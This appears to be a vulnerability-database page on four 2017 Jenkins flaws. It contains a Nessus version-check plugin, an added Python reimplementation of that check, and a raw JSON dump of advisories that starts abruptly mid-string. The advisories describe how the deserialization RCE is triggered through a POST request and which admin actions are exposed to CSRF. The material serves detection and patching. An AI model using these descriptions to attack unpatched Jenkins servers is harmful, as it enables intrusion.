ID: JENKINS_2_57.NASL
Type: nessus
Reporter: This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
Modified: 2021-03-02T00:00:00

Description
The version of Jenkins running on the remote web server is prior to
2.57 or is a version of Jenkins LTS prior to 2.46.2, or else it is
a version of Jenkins Enterprise that is 1.625.x.y prior to 1.625.24.1,
1.651.x.y prior to 1.651.24.1, 2.7.x.0.y prior to 2.7.24.0.1, or
2.x.y.z prior to 2.46.2.1. It is, therefore, affected by multiple
vulnerabilities:

  - A remote code execution vulnerability exists within
    core/src/main/java/jenkins/model/Jenkins.java that
    allows an untrusted serialized Java SignedObject to be
    transferred to the remoting-based Jenkins CLI and
    deserialized using a new ObjectInputStream. By using a
    specially crafted request, an unauthenticated, remote
    attacker can exploit this issue to bypass existing
    blacklist protection mechanisms and execute arbitrary
    code. (CVE-2017-1000353)

  - A flaw exists in the remoting-based CLI, specifically in
    the ClientAuthenticationCache.java class, when storing
    the encrypted username of a successfully authenticated
    user in a cache file that is used to authenticate
    further commands. An authenticated, remote attacker who
    has sufficient permissions to create secrets in Jenkins
    and download their encrypted values can exploit this
    issue to impersonate any other Jenkins user on the same
    instance. (CVE-2017-1000354)

  - A denial of service vulnerability exists in the XStream
    library. An authenticated, remote attacker who has
    sufficient permissions, such as creating or configuring
    items, views or jobs, can exploit this to crash the Java
    process by using specially crafted XML content.
    (CVE-2017-1000355)

  - Cross-site request forgery (XSRF) vulnerabilities exist
    within multiple Java classes due to a failure to require
    multiple steps, explicit confirmation, or a unique token
    when performing certain sensitive actions. An
    unauthenticated, remote attacker can exploit these to
    perform several administrative actions by convincing a
    user into opening a specially crafted web page.
    (CVE-2017-1000356)

Note that Nessus has not tested for these issues but has instead
relied only on the application's self-reported version number.
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(99984);
  script_version("1.8");
  script_cvs_date("Date: 2019/11/13");

  script_cve_id(
    "CVE-2017-1000353",
    "CVE-2017-1000354",
    "CVE-2017-1000355",
    "CVE-2017-1000356"
  );
  script_bugtraq_id(
    98056,
    98062,
    98065,
    98066
  );

  script_name(english:"Jenkins < 2.46.2 / 2.57 and Jenkins Enterprise < 1.625.24.1 / 1.651.24.1 / 2.7.24.0.1 / 2.46.2.1 Multiple Vulnerabilities");
  script_summary(english:"Checks the Jenkins version.");

  script_set_attribute(attribute:"synopsis", value:
"A job scheduling and management system hosted on the remote web server
is affected by multiple vulnerabilities.");
  script_set_attribute(attribute:"description", value:
"The version of Jenkins running on the remote web server is prior to
2.57 or is a version of Jenkins LTS prior to 2.46.2, or else it is
a version of Jenkins Enterprise that is 1.625.x.y prior to 1.625.24.1,
1.651.x.y prior to 1.651.24.1, 2.7.x.0.y prior to 2.7.24.0.1, or
2.x.y.z prior to 2.46.2.1. It is, therefore, affected by multiple
vulnerabilities :

  - A remote code execution vulnerability exists within
    core/src/main/java/jenkins/model/Jenkins.java that
    allows an untrusted serialized Java SignedObject to be
    transferred to the remoting-based Jenkins CLI and
    deserialized using a new ObjectInputStream. By using a
    specially crafted request, an unauthenticated, remote
    attacker can exploit this issue to bypass existing
    blacklist protection mechanisms and execute arbitrary
    code. (CVE-2017-1000353)

  - A flaw exists in the remoting-based CLI, specifically in
    the ClientAuthenticationCache.java class, when storing
    the encrypted username of a successfully authenticated
    user in a cache file that is used to authenticate
    further commands. An authenticated, remote attacker who
    has sufficient permissions to create secrets in Jenkins
    and download their encrypted values can exploit this
    issue to impersonate any other Jenkins user on the same
    instance. (CVE-2017-1000354)

  - A denial of service vulnerability exists in the XStream
    library. An authenticated, remote attacker who has
    sufficient permissions, such as creating or configuring
    items, views or jobs, can exploit this to crash the Java
    process by using specially crafted XML content.
    (CVE-2017-1000355)

  - Cross-site request forgery (XSRF) vulnerabilities exist
    within multiple Java classes due to a failure to require
    multiple steps, explicit confirmation, or a unique token
    when performing certain sensitive actions. An
    unauthenticated, remote attacker can exploit these to
    perform several administrative actions by convincing a
    user into opening a specially crafted web page.
    (CVE-2017-1000356)

Note that Nessus has not tested for these issues but has instead
relied only on the application's self-reported version number.");
  script_set_attribute(attribute:"see_also", value:"https://www.cloudbees.com/cloudbees-security-advisory-2017-04-26");
  script_set_attribute(attribute:"see_also", value:"https://jenkins.io/security/advisory/2017-04-26/");
  # https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?9c6d83db");
  script_set_attribute(attribute:"solution", value:
"Upgrade Jenkins to version 2.57 or later, Jenkins LTS to version
2.46.2 or later, or Jenkins Enterprise to version 1.625.24.1 /
1.651.24.1 / 2.7.24.0.1 / 2.46.2.1 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:ND");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:X");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-1000353");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"in_the_news", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2017/04/13");
  script_set_attribute(attribute:"patch_publication_date", value:"2017/04/26");
  script_set_attribute(attribute:"plugin_publication_date", value:"2017/05/04");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:cloudbees:jenkins");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("jenkins_detect.nasl");
  script_require_keys("www/Jenkins");
  script_require_ports("Services/www", 8080);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:8080);
get_kb_item_or_exit("www/Jenkins/"+port+"/Installed");
url = build_url(qs:'/', port:port);

version = '';
fix = '';

# Jenkins Enterprise by CloudBees carries its own version scheme, so the
# fixed version depends on which Enterprise branch is installed.
if (get_kb_item("www/Jenkins/"+port+"/enterprise/Installed"))
{
  appname = "Jenkins Enterprise by CloudBees";
  version = get_kb_item("www/Jenkins/"+port+"/enterprise/CloudBeesVersion");

  if (version =~ "^1\.651\.")
  {
    fix = '1.651.24.1';
  }
  else if (version =~ "^1\.625\." )
  {
    fix = '1.625.24.1';
  }
  else if (version =~ "^2\.7\." )
  {
    fix = '2.7.24.0.1';
  }
  else
  {
    fix = '2.46.2.1';
  }
}
else
{
  # Open-source Jenkins: LTS and weekly main line have different fixed versions.
  if (get_kb_item("www/Jenkins/"+port+"/is_LTS") )
  {
    appname = "Jenkins Open Source LTS";
    fix = '2.46.2';
  }
  else
  {
    appname = "Jenkins Open Source";
    fix = '2.57';
  }

  version = get_kb_item("www/Jenkins/" + port + "/JenkinsVersion");
  if (version == 'unknown')
  {
    audit(AUDIT_UNKNOWN_WEB_APP_VER, appname, url);
  }
}

# Non-strict comparison: report only when the detected version sorts below the fix.
if (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)
{
  report =
    '\n  URL           : ' + url +
    '\n  Product       : ' + appname +
    '\n  Version       : ' + version +
    '\n  Fixed version : ' + fix +
    '\n';

  security_report_v4(port:port, severity:SECURITY_HOLE, extra:report, xsrf:TRUE);
}
else audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, url, version);
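The plugin above is a pure version check: pick the fixed version for the product line that was detected (Enterprise branch, LTS, or weekly main line), compare the self-reported version against it, and report only when it sorts lower. The following Python is an added example written for this page, not Tenable's code and not part of the plugin; it reproduces that decision logic on a constructed HTTP response so the branch selection and the edge cases (unknown version, versions of different length) can be run and inspected offline. Two things are assumptions of the example rather than statements from the page: that the self-reported version is read from an `X-Jenkins` response header, and that a three-component open-source version (2.46.1) is LTS while a two-component one (2.56) is the weekly line, which stands in for the detector's `is_LTS` flag. The lenient comparison pads missing trailing components with zero, which is how this example interprets `strict:FALSE`.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Fixed versions per product line, as stated in the plugin's solution text.
FIX_MAINLINE = "2.57"
FIX_LTS = "2.46.2"
# Jenkins Enterprise branches: (version-prefix regex, fixed version), checked
# in the same order the plugin uses; anything else falls through to 2.46.2.1.
ENTERPRISE_FIXES = [
    (r"^1\.651\.", "1.651.24.1"),
    (r"^1\.625\.", "1.625.24.1"),
    (r"^2\.7\.", "2.7.24.0.1"),
]
ENTERPRISE_DEFAULT_FIX = "2.46.2.1"

# Constructed sample of the head of a Jenkins HTTP response. Assumption of this
# example: the self-reported version comes from the X-Jenkins header.
SAMPLE_RESPONSE_HEAD = (
    "HTTP/1.1 403 Forbidden\r\n"
    "X-Jenkins: 2.46.1\r\n"
    "X-Jenkins-Session: 0123abcd\r\n"
    "Content-Type: text/html;charset=UTF-8\r\n"
    "\r\n"
)

_DOTTED = re.compile(r"^\d+(\.\d+)*$")


def self_reported_version(response_head: str) -> str:
    """Pull a dotted-numeric version out of the X-Jenkins header; 'unknown' if absent."""
    for line in response_head.split("\r\n"):
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "x-jenkins" and _DOTTED.match(value.strip()):
            return value.strip()
    return "unknown"


def ver_compare(ver: str, fix: str) -> int:
    """-1 if ver < fix, 0 if equal, 1 if greater. Missing trailing components
    count as 0 (2.46 == 2.46.0): the lenient behaviour assumed for strict:FALSE."""
    a = [int(p) for p in ver.split(".")]
    b = [int(p) for p in fix.split(".")]
    width = max(len(a), len(b))
    a += [0] * (width - len(a))
    b += [0] * (width - len(b))
    return (a > b) - (a < b)


def fixed_version_for(version: str, enterprise: bool, is_lts: bool) -> str:
    """Select the fixed version the same way the plugin's if/else chain does."""
    if enterprise:
        for prefix, fix in ENTERPRISE_FIXES:
            if re.match(prefix, version):
                return fix
        return ENTERPRISE_DEFAULT_FIX
    return FIX_LTS if is_lts else FIX_MAINLINE


@dataclass
class Finding:
    status: str          # "affected", "not_affected" or "unknown"
    product: str
    version: str
    fix: Optional[str]


def check_jenkins(version: str, enterprise: bool = False,
                  is_lts: Optional[bool] = None) -> Finding:
    """Version-only check. is_lts=None approximates the detector's LTS flag by
    treating three-component versions as LTS (assumption of this example)."""
    if enterprise:
        product = "Jenkins Enterprise by CloudBees"
    else:
        if is_lts is None:
            is_lts = version.count(".") == 2
        product = "Jenkins Open Source LTS" if is_lts else "Jenkins Open Source"
    if not _DOTTED.match(version):
        # Mirrors audit(AUDIT_UNKNOWN_WEB_APP_VER): no verdict without a version.
        return Finding("unknown", product, version, None)
    fix = fixed_version_for(version, enterprise, bool(is_lts))
    if ver_compare(version, fix) < 0:
        return Finding("affected", product, version, fix)
    return Finding("not_affected", product, version, fix)


def report(f: Finding) -> str:
    """Render the same fields the plugin puts in its report."""
    return (f"\n  Product       : {f.product}"
            f"\n  Version       : {f.version}"
            f"\n  Fixed version : {f.fix or 'n/a'}"
            f"\n  Status        : {f.status}\n")


if __name__ == "__main__":
    print(report(check_jenkins(self_reported_version(SAMPLE_RESPONSE_HEAD))))
    print(report(check_jenkins("1.651.3.1", enterprise=True)))
```

Because the verdict rests entirely on a banner, the same caveat the plugin states applies here: a proxy that strips the header yields "unknown" rather than a finding, and a backported fix that leaves the version string untouched still shows as affected, so the result is a prompt to confirm the installed build, not proof either way.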
trying to instantiate void/Void\n\n", "edition": 5, "modified": "2017-04-26T00:00:00", "published": "2017-04-26T00:00:00", "id": "631C4710-9BE5-4A80-9310-EB2847FE24DD", "href": "https://vuxml.freebsd.org/freebsd/631c4710-9be5-4a80-9310-eb2847fe24dd.html", "title": "jenkins -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2021-02-02T06:36:31", "description": "Jenkins versions 2.56 and earlier as well as 2.46.1 LTS and earlier are vulnerable to a login command which allowed impersonating any Jenkins user. The `login` command available in the remoting-based CLI stored the encrypted user name of the successfully authenticated user in a cache file used to authenticate further commands. Users with sufficient permission to create secrets in Jenkins, and download their encrypted values (e.g. with Job/Configure permission), were able to impersonate any other Jenkins user on the same instance.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-29T17:29:00", "title": "CVE-2017-1000354", "type": "cve", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": true, 
"impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000354"], "modified": "2018-02-15T18:25:00", "cpe": ["cpe:/a:jenkins:jenkins:2.56", "cpe:/a:jenkins:jenkins:2.46.1"], "id": "CVE-2017-1000354", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000354", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:jenkins:jenkins:2.56:*:*:*:*:*:*:*", "cpe:2.3:a:jenkins:jenkins:2.46.1:*:*:*:lts:*:*:*"]}, {"lastseen": "2021-02-02T06:36:31", "description": "Jenkins versions 2.56 and earlier as well as 2.46.1 LTS and earlier are vulnerable to an XStream: Java crash when trying to instantiate void/Void.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-01-29T17:29:00", "title": "CVE-2017-1000355", "type": "cve", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000355"], "modified": "2018-02-15T13:14:00", "cpe": ["cpe:/a:jenkins:jenkins:2.56", "cpe:/a:jenkins:jenkins:2.46.1"], "id": "CVE-2017-1000355", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000355", "cvss": {"score": 4.0, 
"vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:jenkins:jenkins:2.56:*:*:*:*:*:*:*", "cpe:2.3:a:jenkins:jenkins:2.46.1:*:*:*:lts:*:*:*"]}, {"lastseen": "2021-02-02T06:36:31", "description": "Jenkins versions 2.56 and earlier as well as 2.46.1 LTS and earlier are vulnerable to an issue in the Jenkins user database authentication realm: create an account if signup is enabled; or create an account if the victim is an administrator, possibly deleting the existing default admin user in the process and allowing a wide variety of impacts.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-29T17:29:00", "title": "CVE-2017-1000356", "type": "cve", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000356"], "modified": "2018-02-15T13:15:00", "cpe": ["cpe:/a:jenkins:jenkins:2.56", "cpe:/a:jenkins:jenkins:2.46.1"], "id": "CVE-2017-1000356", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000356", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:jenkins:jenkins:2.56:*:*:*:*:*:*:*", 
"cpe:2.3:a:jenkins:jenkins:2.46.1:*:*:*:lts:*:*:*"]}, {"lastseen": "2021-02-02T06:36:31", "description": "Jenkins versions 2.56 and earlier as well as 2.46.1 LTS and earlier are vulnerable to an unauthenticated remote code execution. An unauthenticated remote code execution vulnerability allowed attackers to transfer a serialized Java `SignedObject` object to the Jenkins CLI, that would be deserialized using a new `ObjectInputStream`, bypassing the existing blacklist-based protection mechanism. We're fixing this issue by adding `SignedObject` to the blacklist. We're also backporting the new HTTP CLI protocol from Jenkins 2.54 to LTS 2.46.2, and deprecating the remoting-based (i.e. Java serialization) CLI protocol, disabling it by default.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-29T17:29:00", "title": "CVE-2017-1000353", "type": "cve", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000353"], "modified": "2020-09-22T22:15:00", "cpe": ["cpe:/a:jenkins:jenkins:2.56", "cpe:/a:jenkins:jenkins:2.46.1"], "id": "CVE-2017-1000353", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000353", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:jenkins:jenkins:2.56:*:*:*:*:*:*:*", "cpe:2.3:a:jenkins:jenkins:2.46.1:*:*:*:lts:*:*:*"]}], "attackerkb": [{"lastseen": "2020-11-18T06:37:47", "bulletinFamily": "info", "cvelist": ["CVE-2017-1000353"], "description": "Jenkins versions 2.56 and earlier as well as 2.46.1 LTS and earlier are vulnerable to an unauthenticated remote code execution. An unauthenticated remote code execution vulnerability allowed attackers to transfer a serialized Java `SignedObject` object to the Jenkins CLI, that would be deserialized using a new `ObjectInputStream`, bypassing the existing blacklist-based protection mechanism. We\u2019re fixing this issue by adding `SignedObject` to the blacklist. We\u2019re also backporting the new HTTP CLI protocol from Jenkins 2.54 to LTS 2.46.2, and deprecating the remoting-based (i.e. Java serialization) CLI protocol, disabling it by default.\n\n \n**Recent assessments:** \n \n**space-r7** at September 11, 2020 5:56pm UTC reported:\n\nThe `readFrom` method within the `Command` class in the Jenkins CLI remoting component deserializes objects received from clients without first checking / sanitizing the data. Because of this, a malicious serialized object contained within a serialized `SignedObject` can be sent to the Jenkins endpoint to achieve code execution on the target.\n\nThis is a fairly old vulnerability, so it\u2019s _unlikely_ that there are many, if any vulnerable installations on the web today, but I rated this vulnerability based on what it _could_ give an attacker if they were to find a vulnerable installation online today. This vulnerability is yet another Java deserialization vulnerability that I would define as critical given a number of reasons:\n\n 1. Unauthenticated code execution \n\n 2. 
There is no special / proprietary protocol that will hinder exploitation ( you just send the object in the body of a POST request ) \n\n 3. A proof of concept exists and has for some time \n\n\nAgain, this is an unlikely target given the date of the vulnerability, but I think an attacker would definitely aim to exploit this if it was spotted online.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4\n", "modified": "2020-09-23T00:00:00", "published": "2018-01-29T00:00:00", "id": "AKB:5A79A3DC-D4D7-4FF8-BE45-A4E658714412", "href": "https://attackerkb.com/topics/V3oreaqint/cve-2017-1000353", "type": "attackerkb", "title": "CVE-2017-1000353", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2020-09-22T18:36:43", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000354", "CVE-2017-1000355", "CVE-2017-1000356"], "description": "Arch Linux Security Advisory ASA-201704-8\n=========================================\n\nSeverity: High\nDate : 2017-04-27\nCVE-ID : CVE-2017-1000354 CVE-2017-1000355 CVE-2017-1000356\nPackage : jenkins\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-255\n\nSummary\n=======\n\nThe package jenkins before version 2.57-1 is vulnerable to multiple\nissues including cross-site request forgery, privilege escalation and\narbitrary code execution.\n\nResolution\n==========\n\nUpgrade to 2.57-1.\n\n# pacman -Syu \"jenkins>=2.57-1\"\n\nThe problems have been fixed upstream in version 2.57.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2017-1000354 (privilege escalation)\n\nThe login command available in the remoting-based CLI stored the\nencrypted user name of the successfully authenticated user in a cache\nfile used to authenticate further commands. Users with sufficient\npermission to create secrets in Jenkins, and download their encrypted\nvalues (e.g. 
with Job/Configure permission), were able to impersonate\nany other Jenkins user on the same instance.\n\nThis has been fixed by storing the cached authentication as a hash-\nbased MAC with a key specific to the Jenkins instance and the CLI\nauthentication cache.\n\nPreviously cached authentications are invalidated when upgrading\nJenkins to a version containing a fix for this.\n\n- CVE-2017-1000355 (arbitrary code execution)\n\nJenkins uses the XStream library to serialize and deserialize XML. Its\nmaintainer recently published a security vulnerability that allows\nanyone able to provide XML to Jenkins for processing using XStream to\ncrash the Java process. In Jenkins this typically applies to users with\npermission to create or configure items (jobs), views, or agents.\n\nJenkins now prohibits the attempted deserialization of void / Void that\nresults in a crash.\n\n- CVE-2017-1000356 (cross-site request forgery)\n\nMultiple Cross-Site Request Forgery vulnerabilities in Jenkins allowed\nmalicious users to perform several administrative actions by tricking a\nvictim into opening a web page. 
The most notable ones:\n\nSECURITY-412: Restart Jenkins immediately, after all builds are\nfinished, or after all plugin installations and builds are finished\nSECURITY-412: Schedule a downgrade of Jenkins to a previously installed\nversion if Jenkins previously upgraded itself\nSECURITY-413: Install and (optionally) dynamically load any plugin\npresent on a configured update site\nSECURITY-414: Remove any update site from the Jenkins configuration\nSECURITY-415: Change a user\u2019s API token\nSECURITY-416: Submit system configuration\nSECURITY-417: Submit global security configuration\nSECURITY-418, SECURITY-420: For Jenkins user database authentication\nrealm: create an account if signup is enabled; or create an account if\nthe victim is an administrator, possibly deleting the existing default\nadmin user in the process\nSECURITY-419: Create a new agent, possibly executing arbitrary shell\ncommands on the master node by choosing the appropriate launch method\nSECURITY-420: Update the node monitor data on all agents\n\nImpact\n======\n\nA remote attacker can escalate privileges, execute arbitrary code or\nexecute cross-site request forgery which allows the attacker to perform\nseveral administrative actions.\n\nReferences\n==========\n\nhttps://jenkins.io/security/advisory/2017-04-26/\nhttp://seclists.org/oss-sec/2017/q2/132\nhttp://www.openwall.com/lists/oss-security/2017/04/03/4\nhttps://security.archlinux.org/CVE-2017-1000354\nhttps://security.archlinux.org/CVE-2017-1000355\nhttps://security.archlinux.org/CVE-2017-1000356", "modified": "2017-04-27T00:00:00", "published": "2017-04-27T00:00:00", "id": "ASA-201704-8", "href": "https://security.archlinux.org/ASA-201704-8", "type": "archlinux", "title": "[ASA-201704-8] jenkins: multiple issues", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T11:57:53", "description": "Multiple Cross-Site Request Forgery vulnerabilities in Jenkins allowed malicious users to 
perform several administrative actions by tricking a victim into opening a web page. The most notable ones:\r\n\r\n* SECURITY-412: Restart Jenkins immediately, after all builds are finished, or after all plugin installations and builds are finished\r\n\r\n* SECURITY-412: Schedule a downgrade of Jenkins to a previously installed version if Jenkins previously upgraded itself\r\n\r\n* SECURITY-413: Install and (optionally) dynamically load any plugin present on a configured update site\r\n\r\n* SECURITY-414: Remove any update site from the Jenkins configuration\r\n\r\n* SECURITY-415: Change a user\u2019s API token\r\n\r\n* SECURITY-416: Submit system configuration\r\n\r\n* SECURITY-417: Submit global security configuration\r\n\r\n* SECURITY-418, SECURITY-420: For Jenkins user database authentication realm: create an account if signup is enabled; or create an account if the victim is an administrator, possibly deleting the existing default _admin_ user in the process\r\n\r\n* SECURITY-419: Create a new agent, possibly executing arbitrary shell commands on the master node by choosing the appropriate launch method\r\n\r\n* SECURITY-420: Cancel a scheduled restart\r\n\r\n* SECURITY-420: Configure the global logging levels\r\n\r\n* SECURITY-420: Create a copy of an existing agent\r\n\r\n* SECURITY-420: Create copies of views in users' \"My Views\" or as children of the experimental \"Tree View\" feature\r\n\r\n* SECURITY-420: Enter \"quiet down\" mode in which no new builds are started\r\n\r\n* SECURITY-420: On Windows, after successful installation as a service, restart\r\n\r\n* SECURITY-420: On Windows, try to install Jenkins as a service\r\n\r\n* SECURITY-420: Set the descriptions of items (jobs), builds, and users\r\n\r\n* SECURITY-420: Submit global tools configuration (Jenkins 2.0 and up)\r\n\r\n* SECURITY-420: Toggle keeping a build forever (i.e. 
exclude or include it in log rotation)\r\n\r\n* SECURITY-420: Try to connect all disconnected agents simultaneously\r\n\r\n* SECURITY-420: Update the node monitor data on all agents\r\n\r\nThe above, as well as several other more minor issues, have all been fixed and these actions now require POST requests, and, if configured, a CSRF crumb, to work.", "published": "2017-04-28T00:00:00", "type": "seebug", "title": "Jenkins Multiple CSRF vulnerabilities (CVE-2017-1000356)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-1000356"], "modified": "2017-04-28T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-93063", "id": "SSV:93063", "sourceData": "", "sourceHref": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-11-19T11:57:52", "description": "The login command available in the remoting-based CLI stored the encrypted user name of the successfully authenticated user in a cache file used to authenticate further commands. Users with sufficient permission to create secrets in Jenkins, and download their encrypted values (e.g. 
with Job/Configure permission), were able to impersonate any other Jenkins user on the same instance.\r\n\r\nThis has been fixed by storing the cached authentication as a hash-based MAC with a key specific to the Jenkins instance and the CLI authentication cache.\r\n\r\nPreviously cached authentications are invalidated when upgrading Jenkins to a version containing a fix for this.", "published": "2017-04-28T00:00:00", "type": "seebug", "title": "Jenkins CLI: Login command allowed impersonating any Jenkins user (CVE-2017-1000354)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-1000354"], "modified": "2017-04-28T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-93064", "id": "SSV:93064", "sourceData": "", "sourceHref": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-11-19T11:57:52", "description": "#### **Vulnerability Summary**\r\n\r\nThe following advisory describes Java deserialization vulnerability found in CloudBees Jenkins version 2.32.1 that leads to a Remote Code Execution.\r\n\r\nJenkins helps to automate the non-human part of the whole software development process with now common things like continuous integration and by empowering teams to implement the technical aspects of continuous delivery. It is a server-based system running in a servlet container such as Apache Tomcat. It supports version control tools, including AccuRev, CVS, Subversion, Git, Mercurial, Perforce, Clearcase and RTC, and can execute Apache Ant, Apache Maven and sbt based projects as well as arbitrary shell scripts and Windows batch commands.\r\n\r\n**Credit**\r\nAn independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.\r\n\r\n**Vendor Response**\r\nCloudBees Jenkins has released patches to address this vulnerability and issued CVE-2017-1000353 for the vulnerability. 
